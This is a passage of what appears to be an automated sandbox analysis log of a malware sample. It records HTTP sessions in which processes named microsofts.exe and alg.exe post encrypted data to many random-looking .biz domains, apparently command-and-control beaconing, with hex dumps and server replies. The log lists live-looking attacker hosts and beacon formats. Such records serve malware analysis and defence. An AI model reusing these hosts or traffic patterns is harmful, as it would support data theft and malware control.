                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:51 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.954931021 CEST354OUTPOST /vipiwgiihx HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.954965115 CEST828OUTData Raw: 19 62 9c d9 d3 86 77 b4 30 03 00 00 b7 df 9e 57 d4 c2 b2 02 d5 58 96 01 40 50 5b 8a ff d9 41 18 b5 ed 4f eb f1 49 88 84 1f 77 c3 e8 bb 5b 59 1b b2 d8 d1 d0 44 ee 83 5e 5d ad 34 fc 4f c0 d1 f2 7c 77 01 61 02 0f 5e c3 41 a5 a9 7b 97 4c fa f2 66 80
                                                                                                                                                                                                                                                                                                          Data Ascii: bw0WX@P[AOIw[YD^]4O|wa^A{Lfv#~\N.G9NpuuQrx6nVj>,X-h&3Reu!pD[$HF0 v&+42Wgv|kkgFVVU'eA!0
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.071495056 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:52 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          71192.168.2.55005213.251.16.15080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.091928005 CEST356OUTPOST /yclqyqmghucjea HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: qaynky.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.092071056 CEST828OUTData Raw: 2d 26 1d 86 96 f4 dd 06 30 03 00 00 3d f7 d4 bf 6a 44 18 0f 96 b6 ac 7d 1e c7 ac 3b 90 10 5b 47 c5 a5 16 1e 1e ec 52 b4 69 c0 3c 96 25 8b d0 89 8b 49 b7 5a d9 e5 25 0e e0 c0 ff 58 7a 15 46 31 7b c3 3d 01 79 53 0e 5f af 4e 3d 2b 49 ae d6 03 40 82
                                                                                                                                                                                                                                                                                                          Data Ascii: -&0=jD};[GRi<%IZ%XzF1{=yS_N=+I@-O^EN\-f:kWiX^`@uH}e:.e/=E+o+I ]hnx0+)(,r>>@00
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.478326082 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:53 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=9e38f2822531c1c6d8774f1605fa5463|8.46.123.33|1728547733|1728547733|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          72192.168.2.55005318.208.156.248807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.483406067 CEST361OUTPOST /wcffwbepjknhrkkd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.483406067 CEST778OUTData Raw: 70 29 6e 40 16 22 05 39 fe 02 00 00 75 dc 74 d7 65 28 71 15 e5 e8 0f 15 ad d6 4e 58 cd 7c 46 1b c3 2d 12 18 37 1f 44 08 80 a4 0c 12 d9 c0 fa 2b 96 da 8e 9a a8 07 ae 10 1d eb 5c 4d 40 af 3e e8 db 16 98 66 0c b5 5a 61 c4 85 1b 75 c5 31 ce 4d 0c ed
                                                                                                                                                                                                                                                                                                          Data Ascii: p)n@"9ute(qNX|F-7D+\M@>fZau1MU.GcWo^#aY+mQoA}2#J`2$yybt3y1?k5<'W{[`Pev-uPLemaxM]mR`u.?-E
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.946887970 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:52 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=5782b28a3f5999d9b4caabad7985d9ab|8.46.123.33|1728547732|1728547732|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          73192.168.2.55005444.221.84.10580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.607645988 CEST361OUTPOST /fsupyedkjsaginlp HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.607661009 CEST828OUTData Raw: 3f 61 6a b3 9e bb 3b e2 30 03 00 00 89 1b 59 f7 79 74 41 b1 01 14 44 51 b3 95 a0 54 93 0f 8b 18 03 75 ee a9 47 21 a5 15 a3 5f 54 f7 b0 5b e6 55 c6 49 11 f0 21 15 71 4c 1b f3 54 7f 64 55 f7 31 ce ed 11 a3 c3 cb de 36 af be 01 f5 ca 8c f4 31 85 33
                                                                                                                                                                                                                                                                                                          Data Ascii: ?aj;0YytADQTuG!_T[UI!qLTdU1613'o)C#SSnJ@l%4(AIw/Wghrc\sSX92S]H,!nac2&~PXVTExS-
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.091234922 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:54 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=773a7962f685a2ab2f299f059615f9d3|8.46.123.33|1728547734|1728547734|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          74192.168.2.55005513.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.622752905 CEST357OUTPOST /oknxycjjxcvmcyg HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.622766018 CEST778OUTData Raw: 46 90 2f 11 9d 15 48 0e fe 02 00 00 7a 7e 9a b8 fb 2e 51 70 44 3b 79 c2 e1 eb 36 29 d5 8c 52 ad 68 6c 8f 84 ce e6 5d 76 44 b8 69 7a 9b f9 a9 e9 3e aa c2 8a 82 09 58 67 40 63 f7 78 21 e6 8b 4a 6d ff 52 cd f8 c8 8b 4d 68 bf 90 79 bc f5 4a a7 cf ce
                                                                                                                                                                                                                                                                                                          Data Ascii: F/Hz~.QpD;y6)Rhl]vDiz>Xg@cx!JmRMhyJ:s.LK{P~kEO:Vf9:3E799h#`Z.2wjjsPP A(j.2t|N"78yi7p(W5kt7>CrL1-
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.983011961 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:54 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=596c369c5720579ffb2ac5a3893fc733|8.46.123.33|1728547734|1728547734|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          75192.168.2.55005654.244.188.17780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.132848978 CEST355OUTPOST /kquvnwuqqcd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.132863045 CEST828OUTData Raw: 9a 71 83 79 40 65 3f c5 30 03 00 00 da f3 e6 df c9 29 b4 7b 36 d9 78 cd 94 ed 18 31 f8 00 4f d6 15 22 8d cc da dc a2 d2 ec a6 71 13 77 a1 67 cb d9 ec 0b 06 35 00 02 f4 5a fa 47 37 bd dc 0d d4 96 f5 99 47 b2 f3 3a f7 91 04 93 63 55 06 75 d5 49 4e
                                                                                                                                                                                                                                                                                                          Data Ascii: qy@e?0){6x1O"qwg5ZG7G:cUuINoc1<@ideL~|">MUf"%nH/%OT 38fzSfT.dV}fUo@XE5fB4p3yRD}>(UMqQb
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.853517056 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:54 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=d711bb618d548e5256311ee59166405b|8.46.123.33|1728547734|1728547734|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          76192.168.2.55005735.164.78.20080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.889446020 CEST347OUTPOST /ggwhl HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.889446020 CEST828OUTData Raw: 34 0a 35 e1 c5 12 31 f0 30 03 00 00 a5 99 b8 d6 f2 d6 3d 2e fa 6a 05 af 07 2c f8 af 69 2d 1f 9a ab b6 74 74 54 b3 4e cd 35 af 34 a5 2c 54 c4 f9 fb 75 3e e4 e9 d0 f1 70 e7 46 af 43 a5 86 8c 52 45 0c a4 2a ca cd 31 78 91 84 eb 0b 12 02 d1 d3 d4 3c
                                                                                                                                                                                                                                                                                                          Data Ascii: 4510=.j,i-ttTN54,Tu>pFCRE*1x<l|6y.hdU!TUEop4o9KEkc{~56a_&<H]S`?QTn{CpVa47/!P`5bqjY.3l**(4)/nii%:X
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.617454052 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:55 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=5351ceca1fbd0b5fafa91f24c184dd3e|8.46.123.33|1728547735|1728547735|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          77192.168.2.55005834.246.200.160807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.479811907 CEST357OUTPOST /qcnhkliwpylu HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.479823112 CEST778OUTData Raw: 49 de 23 f4 97 9e 27 5c fe 02 00 00 4a 81 1e 7e fe d3 76 2f e2 4a 6a 04 1b 0f 70 70 0f da 54 a3 66 77 4d 99 37 51 de 2b 03 a5 98 0d e9 a9 66 e5 b1 cf 44 8f df ed c6 63 cc af 0d 32 4b 50 af ed 6c b4 de 83 cb aa a0 bc be ea d5 05 26 14 0a e0 30 df
                                                                                                                                                                                                                                                                                                          Data Ascii: I#'\J~v/JjppTfwM7Q+fDc2KPl&0rN#<mGm;6@h^Gf*h^FThs6h5xR%Gzq`7HW+qJ8D(UF'!,'PXDU>rAZ^4"\&T+"
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.247562885 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:56 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=826bb51793629c90306ceaa23431138b|8.46.123.33|1728547736|1728547736|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          78192.168.2.5500593.94.10.3480576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.651859045 CEST348OUTPOST /gvv HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.651859045 CEST828OUTData Raw: 82 5f cb 6c 0f 04 3c 3f 30 03 00 00 11 a4 62 4f 11 78 66 28 6a 2c dc 58 7e b9 20 bb 8d 3f 34 5c 42 70 c4 da b5 3a d0 48 be 95 19 04 f4 b1 93 8e df 0b b5 e3 ec af 07 f6 26 56 e4 23 de c9 a1 24 18 72 ff 53 8c 27 52 71 cb 7c 17 0c 17 0a c9 ad 11 47
                                                                                                                                                                                                                                                                                                          Data Ascii: _l<?0bOxf(j,X~ ?4\Bp:H&V#$rS'Rq|GQ"T1 G;>![=+SA=I~~Qh1Ky!{rhU|2wt(=pr|G_mA]#b>U;VEN[eVDG!<T^Ye5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.126544952 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:56 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=e4a80bed28fac827ecddcdc5bd7012c6|8.46.123.33|1728547736|1728547736|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          79192.168.2.550060165.160.13.2080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.156876087 CEST351OUTPOST /vhprbmdefc HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: myups.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
